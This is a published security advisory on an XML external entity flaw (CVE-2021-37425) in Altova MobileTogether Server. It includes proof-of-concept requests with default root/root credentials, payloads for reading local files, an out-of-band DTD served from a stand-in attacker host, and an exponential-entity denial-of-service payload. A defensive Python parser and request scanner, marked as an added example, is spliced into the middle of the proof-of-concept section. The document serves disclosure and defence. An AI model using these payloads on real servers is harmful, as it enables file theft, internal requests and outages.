# Exploit Title: Altova MobileTogether Server 7.3 - XML External Entity Injection (XXE)
# Date: 2021-08-10
# Exploit Author: RedTeam Pentesting GmbH
# Vendor Homepage: https://www.altova.com/mobiletogether-server
# Version: 7.3
# CVE: 2021-37425

Advisory: XML External Entity Expansion in MobileTogether Server

RedTeam Pentesting discovered a vulnerability in the MobileTogether Server
which allows users with access to at least one app to read arbitrary,
non-binary files from the file system and perform server-side requests.
The vulnerability can also be used to deny availability of the system. As
an example, this advisory shows the compromise of the server's certificate
and private key.

Details
=======

Product: MobileTogether Server
Affected Versions: 7.0-7.3, potentially earlier versions as well
Fixed Versions: 7.3 SP1
Vulnerability Type: XML External and Exponential Entity Expansion
Security Risk: medium
Vendor URL: https://www.altova.com/mobiletogether-server
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-002
Advisory Status: published
CVE: CVE-2021-37425
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37425

Introduction
============

"MobileTogether Server is the processing powerhouse for your native iOS,
Android, Windows, and browser-based apps. MobileTogether Server is the
back-end hub for your solutions and acts as a gateway between end-users
and your back-end data sources and infrastructure."

(from the vendor's homepage)

More Details
============

MobileTogether Server is a back-end application that hosts developed apps
and provides access to them from various platforms and devices. Access to
these apps is possible via native applications for devices and operating
systems or directly via the browser. To access the MobileTogether Server,
depending on the configuration, either an anonymous login is possible or
credentials are required.
During analysis of the communication between a MobileTogether client
application on a smartphone and the MobileTogether Server, HTTP requests
were observed containing JSON as well as XML data. Generally, the XML data
is used to signal changes in the UI or user-supplied input for the app
hosted in MobileTogether Server. It was found that user-supplied XML
external entities included in the described HTTP requests are resolved by
the MobileTogether Server and the result is reflected in an HTTP response.
This behaviour allows reading local files, performing server-side requests
and also denying the availability of the service through XML exponential
entity expansion. However, file disclosure is limited to non-binary files
and the absolute path needs to be known in advance.

Proof of Concept
================

MobileTogether Server comes with a series of example applications. To
exploit the vulnerability, access to at least one application is required.
In the following, the app EuroFXrates and the default user root with the
default password root are used for demonstration of the vulnerability.
The following HTTP request contains the minimal data required to be
accepted by the server, resulting in the processing of the XML data stored
within the JSON field InfosetChanges/Changes (formatted for better
readability):

------------------------------------------------------------------------
POST /workflowmanagement HTTP/1.1
Authorization: Basic cm9vdDpyb290
Content-Type: application/json
Content-Length: 851
Host: 192.168.1.1:8085
Connection: close

{
  "DeviceY": 0,
  "ClientVersionName": "7.2.2",
  "MobileManufacturer": "",
  "AllInfosetsSerialized": true,
  "ServerName": "192.168.1.1",
  "ProtocolVersionMax": "2",
  "Language": "en-US",
  "DeviceType": "",
  "ClientKey": "1_11148009037086584903_2744738433663963458",
  "DeviceXDPI": 0,
  "DeviceYDPI": 0,
  "DeviceYCanvasWithTabs": 0,
  "ClientArchiveVersionUUID": "{C022C8D8-8B2B-4D45-BD00-0DB942509EA3}",
  "ProtocolVersionMin": "2",
  "DeviceXCanvas": 0,
  "ClientArchiveVersionMin": "-74",
  "MobileOSVersion": "Android 11",
  "DeviceXCanvasWithTabs": 0,
  "ClientArchiveVersionMax": "65",
  "User": "root",
  "DeviceX": 0,
  "DesignFileName": "/public/EuroFXrates",
  "EncValue": "M9EBc6-7P5cd0",
  "DeviceYCanvas": 0,
  "MobileID": "5b39edd9-2533-4a61-ae66-b906893c5412",
  "InfosetChanges": [
    {
      "Changes": [
        {
          "": "<?xml version=\"1.0\" encoding=\"utf-8\"?> <Root> <SkipIntro>false</SkipIntro> </Root>"
        }
      ],
      "ID": "$$PERS$$"
    }
  ],
  "DeviceIsPortrait": true
}
------------------------------------------------------------------------

With the following XML data it can be verified that XML entities are
resolved and reflected within predefined XML tags in the HTTP response:

------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
  <!ENTITY redteam "RedTeam Pentesting">
]>
<Root>
  <RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------

The HTTP response contains the resolved XML entity:
------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]

[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
  <RedTeam>RedTeam Pentesting</RedTeam>
[...]
------------------------------------------------------------------------

The following example shows how local files can be read from a Windows
system hosting the MobileTogether Server:

------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE Root [
  <!ENTITY redteam SYSTEM "file://c:/windows/win.ini">
]>
<Root>
  <RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------

The content of the file is shown below and formatted for better
readability:

------------------------------------------------------------------------
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Server: CherryPy/18.1.0
[...]

[...]
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<Root>
  <RedTeam>
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
  </RedTeam>
[...]
------------------------------------------------------------------------

One interesting target for attackers could be the configuration file for
the MobileTogether Server residing at the following fixed location:

------------------------------------------------------------------------
C:\ProgramData\Altova\MobileTogetherServer\mobiletogetherserver.cfg
------------------------------------------------------------------------

For example, if the server supports HTTPS, the absolute path to the
server's certificate and private key is stored in its configuration.

Furthermore, external XML entities can be used to access third-party
websites as well as web services that are only available internally.
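Every payload in this advisory relies on a DOCTYPE with entity declarations, which the legitimate client XML (a bare <Root> document) never needs. The following Python code is an added example, not part of the advisory or of the vendor's product: it parses client XML with the standard-library expat parser but aborts on the first DOCTYPE or entity declaration, and it labels the InfosetChanges/Changes fragments of a /workflowmanagement JSON body for logging or alerting. The request field names follow the request shown above; the labels and function names are the example's own.

```python
import json
import re
import xml.parsers.expat

class DtdRejected(ValueError):
    """Untrusted XML carried a DOCTYPE or an entity declaration."""

def parse_without_dtd(xml_text):
    """Parse with expat but abort on the first DOCTYPE or entity declaration,
    before any external or nested entity can be expanded. Returns the element
    names seen, which shows that the benign client XML still parses."""
    seen = []
    parser = xml.parsers.expat.ParserCreate()

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE %r not allowed in client XML" % name)

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdRejected("entity declaration %r not allowed" % name)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(xml_text, True)  # handler exceptions propagate from here
    return seen

def is_rejected(xml_text):
    """True if parse_without_dtd refuses the document because of a DTD."""
    try:
        parse_without_dtd(xml_text)
    except DtdRejected:
        return True
    return False

# Detection side: label the XML carried in the JSON request body.
EXTERNAL_ID = re.compile(r"<!ENTITY[^>]*\b(SYSTEM|PUBLIC)\b", re.I)
ANY_DTD = re.compile(r"<!(DOCTYPE|ENTITY)\b", re.I)

def scan_request(body):
    """Label every XML fragment in InfosetChanges[*].Changes[*] of a
    /workflowmanagement JSON body: 'external' (SYSTEM/PUBLIC identifier, so
    file or URL access), 'dtd' (any other DOCTYPE/entity use) or 'ok'."""
    findings = []
    for infoset in json.loads(body).get("InfosetChanges", []):
        for change in infoset.get("Changes", []):
            for xml_text in change.values():
                label = ("external" if EXTERNAL_ID.search(xml_text)
                         else "dtd" if ANY_DTD.search(xml_text) else "ok")
                findings.append((label, infoset.get("ID")))
    return findings
```

The regex labels are a logging aid only; the parser-level rejection is the control, since it does not depend on how the DOCTYPE is spelled.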
Together with an externally hosted XML DTD, response information can be
extracted:

------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % content SYSTEM "http://internal.example.com">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://attacker.example.com/dtd.xml">
  %dtd;
]>
<Root>
  <RedTeam>&redteam;</RedTeam>
</Root>
------------------------------------------------------------------------

The DTD contains the following information:

------------------------------------------------------------------------
<!ENTITY redteam "%start;%content;%end;">
------------------------------------------------------------------------

In the HTTP response, the HTML markup delivered by internal.example.com
is now visible.

A further vulnerability attacks the availability of the service through
XML exponential entity expansion. This is demonstrated with the following
XML document:

------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
  <!ENTITY redteam0 "RedTeam Pentesting">
  <!ENTITY redteam1 "&redteam0; &redteam0;">
  <!ENTITY redteam2 "&redteam1; &redteam1;">
  <!ENTITY redteam3 "&redteam2; &redteam2;">
  <!ENTITY redteam4 "&redteam3; &redteam3;">
  <!ENTITY redteam5 "&redteam4; &redteam4;">
  <!ENTITY redteam6 "&redteam5; &redteam5;">
  <!ENTITY redteam7 "&redteam6; &redteam6;">
  <!ENTITY redteam8 "&redteam7; &redteam7;">
  <!ENTITY redteam9 "&redteam8; &redteam8;">
  <!ENTITY redteam10 "&redteam9; &redteam9;">
  <!ENTITY redteam11 "&redteam10; &redteam10;">
  <!ENTITY redteam12 "&redteam11; &redteam11;">
  <!ENTITY redteam13 "&redteam12; &redteam12;">
  <!ENTITY redteam14 "&redteam13; &redteam13;">
  <!ENTITY redteam15 "&redteam14; &redteam14;">
  <!ENTITY redteam16 "&redteam15; &redteam15;">
  <!ENTITY redteam17 "&redteam16; &redteam16;">
  <!ENTITY redteam18 "&redteam17; &redteam17;">
  <!ENTITY redteam19 "&redteam18; &redteam18;">
  <!ENTITY redteam20 "&redteam19; &redteam19;">
]>
<Root>
  <RedTeam>&redteam20;</RedTeam>
</Root>
------------------------------------------------------------------------

Sending the shown XML document leads to a huge server-side resource
allocation which ultimately disrupts the availability of the
MobileTogether Server.

Workaround
==========

None known.

Fix
===

According to the vendor, upgrading to version 7.3 SP1 resolves the
vulnerability.

Security Risk
=============

Attackers in possession of an account for a MobileTogether Server with
access to at least one app are able to read files from the server system,
conduct HTTP requests to external and internal systems and can also deny
the availability of the service. Access might also be possible through
default credentials or the anonymous user.

Timeline
========

2021-06-21 Vulnerability identified
2021-06-23 Requested a security contact from vendor
2021-06-25 Security contact established with vendor
2021-07-05 Customer approved disclosure to vendor
2021-07-05 Vendor notified
2021-07-20 Vendor acknowledged vulnerability
2021-07-22 CVE ID requested
2021-07-23 CVE ID assigned
2021-07-28 Vendor released fixed version
2021-08-10 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in
Aachen, Germany.
If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH                       Tel.: +49 241 510081-0
Dennewartstr. 25-27                           Fax : +49 241 510081-99
52068 Aachen                                  https://www.redteam-pentesting.de
Germany                                       Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen